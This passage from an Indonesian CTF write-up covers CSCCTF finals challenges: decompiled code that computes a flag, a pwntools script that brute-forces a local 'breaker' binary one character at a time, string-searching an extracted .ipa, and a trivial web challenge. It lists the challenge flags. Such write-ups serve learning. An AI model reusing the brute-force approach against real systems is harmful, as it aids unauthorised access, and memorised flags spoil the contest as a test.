           &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

           &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

               &lt;span class="c1"&gt;# LBB0_8
&lt;/span&gt;
               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt;

               &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

               &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                   &lt;span class="c1"&gt;# LBB0_10
&lt;/span&gt;
                   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;7&lt;/span&gt;

                   &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                   &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                       &lt;span class="c1"&gt;# LBB0_12
&lt;/span&gt;
                       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;8&lt;/span&gt;

                       &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                       &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                           &lt;span class="c1"&gt;# LBB0_14
&lt;/span&gt;
                           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;9&lt;/span&gt;

                           &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                           &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                               &lt;span class="c1"&gt;# LBB0_16
&lt;/span&gt;
                               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;

                               &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                               &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                                   &lt;span class="c1"&gt;# LBB0_18
&lt;/span&gt;
                                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1337&lt;/span&gt;

                                   &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                               &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;

                                   &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                           &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;

                               &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                       &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;

                           &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                   &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                       &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                       &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;2000&lt;/span&gt;

                       &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

               &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

                   &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

           &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;

               &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

       &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;

           &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

   &lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

       &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

       &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;

       &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

   &lt;span class="c1"&gt;# LBB0_26
&lt;/span&gt;
   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

   &lt;span class="n"&gt;sp20&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;

&lt;span class="c1"&gt;# LBB0_28
&lt;/span&gt;
&lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;CSCCTF{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x8&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Hasilnya:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FDYw4dZ--RuZtZnIsSBryhorgWuuKEOwQlkm27HqMk2d4njfq_vhfO52xpkrbtg9lIDi5zyLjoLCwyjmCiYq4t5fKOAPm-vI39q4wk3C06tNjm1ooEU2_qwFimrfbAwcMPu_oh4MG" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FDYw4dZ--RuZtZnIsSBryhorgWuuKEOwQlkm27HqMk2d4njfq_vhfO52xpkrbtg9lIDi5zyLjoLCwyjmCiYq4t5fKOAPm-vI39q4wk3C06tNjm1ooEU2_qwFimrfbAwcMPu_oh4MG" alt="hasil final finalfinal" width="156" height="27"&gt;&lt;/a&gt;&lt;br&gt;
Kita coba submit, akhirnya bener juga :’)&lt;br&gt;
Flag: CSCCTF{1233423}&lt;/p&gt;
&lt;h2&gt;
  
  
  Breaker
&lt;/h2&gt;

&lt;p&gt;Diberikan sebuah binary, saat dirun kami langsung berpikir untuk bruteforce tanpa melihat pseudocodenya h3h3.&lt;/p&gt;

&lt;p&gt;Langsung saja kami buat script bruteforcenya, kami melakukan bruteforce per karakter untuk mendapatkan karakter yang tepat pada tiap guess yang ada.&lt;/p&gt;

&lt;p&gt;Berikut skrip yang kami buat.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;pwn&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;string&lt;/span&gt;

&lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;49&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;

 &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;printable&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

   &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

     &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log_level&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;error&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;

     &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;./breaker&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

     &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="sh"&gt;''&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

       &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

         &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sendline&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

     &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sendline&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

     &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;recvline&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

     &lt;span class="n"&gt;level&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;recv&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;timeout&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

     &lt;span class="c1"&gt;# print level
&lt;/span&gt;
     &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;1/48&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

       &lt;span class="n"&gt;flag&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;

       &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

       &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Flag: &lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;

       &lt;span class="k"&gt;break&lt;/span&gt;

     &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;close&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

   &lt;span class="k"&gt;except&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

     &lt;span class="k"&gt;pass&lt;/span&gt;

&lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;./breaker&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;flag&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

 &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sendline&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;sendline&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;w&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# p.interactive()
&lt;/span&gt;
&lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;recv&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Maunya pake subprocess, tapi ga bisa jadinya pake pwntools hikz :(&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FhabuOjzrSBCE90R5OShK7yt0UX7Auqu0dWIG85iG0lUVnlP8b0_3oDLkaHD9u1lYtSlyTpW8qUg0kd2IRyW1qJR9Q7qrnWYkUIxQ32h8w7c3pOQYl1Xe2xpmzJfqPrYVeO4WKXvL" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2FhabuOjzrSBCE90R5OShK7yt0UX7Auqu0dWIG85iG0lUVnlP8b0_3oDLkaHD9u1lYtSlyTpW8qUg0kd2IRyW1qJR9Q7qrnWYkUIxQ32h8w7c3pOQYl1Xe2xpmzJfqPrYVeO4WKXvL" alt="chal" width="484" height="94"&gt;&lt;/a&gt;&lt;br&gt;
Flag: CSCCTF{wh4t_th3_fun_m0m3nt_brutef0rc1ng_w1th_SubPr0cesS}&lt;/p&gt;

&lt;h2&gt;
  
  
  Cr4shed
&lt;/h2&gt;

&lt;p&gt;Diberikan file .ipa, jika dicek dengan perintah file, ternyata merupakan Zip archive data&lt;/p&gt;

&lt;p&gt;Langsung saja kita unzip, berikut adalah beberapa file yang berhasil di extract.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FE4nPphVs6ygEV2-lF-GojGSV2Th0XsdBggifJfTSjqTxYNJlnnnHxo08Ds_OVKXzHGTeqNRgz2EwImOsIUDP9_skansdNz3fEaOqa4tRzZ2NJFi1JinfEEpNgAjvti0nDxbQW80j" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2FE4nPphVs6ygEV2-lF-GojGSV2Th0XsdBggifJfTSjqTxYNJlnnnHxo08Ds_OVKXzHGTeqNRgz2EwImOsIUDP9_skansdNz3fEaOqa4tRzZ2NJFi1JinfEEpNgAjvti0nDxbQW80j" alt="chal" width="816" height="417"&gt;&lt;/a&gt;&lt;br&gt;
Berdasarkan pengalaman waktu kualifikasi, kami langsung mencari string “CSCCTF” di semua tempat. Ya, kami menemukan flagnya. Pengalaman memang guru terbaik h3h3h3&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FJjBgr2It3BCeZjp4Ef5z5tgWQbu63HasuBeKIi3zrmx-6j5rtsqqwNxX57V3bcHlKvkSB7-put8TqilxzoiiyAue15qi_drAar7ymrSNCVup6L17uWWhkBml1HD_4YTSA2IRHkTj" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh4.googleusercontent.com%2FJjBgr2It3BCeZjp4Ef5z5tgWQbu63HasuBeKIi3zrmx-6j5rtsqqwNxX57V3bcHlKvkSB7-put8TqilxzoiiyAue15qi_drAar7ymrSNCVup6L17uWWhkBml1HD_4YTSA2IRHkTj" alt="chal" width="814" height="290"&gt;&lt;/a&gt;&lt;br&gt;
Flag: CSCCTF{G00dR3v3rs3rC4nM4k34L0T0fM0n3Y}&lt;/p&gt;

&lt;h2&gt;
  
  
  Web Exploitation
&lt;/h2&gt;

&lt;p&gt;Diberikan web dengan tampilan sebagai berikut&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FMElO8ifk-9Evvi1jtg2bLQL9Q6MCXC3cRfBipmGIQUd4iufZg_YQuX_XK8oTJxDrs8RMgiPTIs_Z4qxpU8Npfcj7S7-UjjPCVpmkTtnk6T0VSvCY59Ivv7nYVHsmdpW7T6Ar7QxO" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh5.googleusercontent.com%2FMElO8ifk-9Evvi1jtg2bLQL9Q6MCXC3cRfBipmGIQUd4iufZg_YQuX_XK8oTJxDrs8RMgiPTIs_Z4qxpU8Npfcj7S7-UjjPCVpmkTtnk6T0VSvCY59Ivv7nYVHsmdpW7T6Ar7QxO" alt="chal" width="639" height="240"&gt;&lt;/a&gt;&lt;br&gt;
Langsung saja mendaftar dengan&lt;/p&gt;

&lt;p&gt;Email: &lt;a href="mailto:a@a.com"&gt;a@a.com&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Password: password&lt;/p&gt;

&lt;p&gt;Login, lalu tinggal klik “Get Some CSCCTF Thingy Tiny Pointy Flaggy”, flag muncul&lt;br&gt;
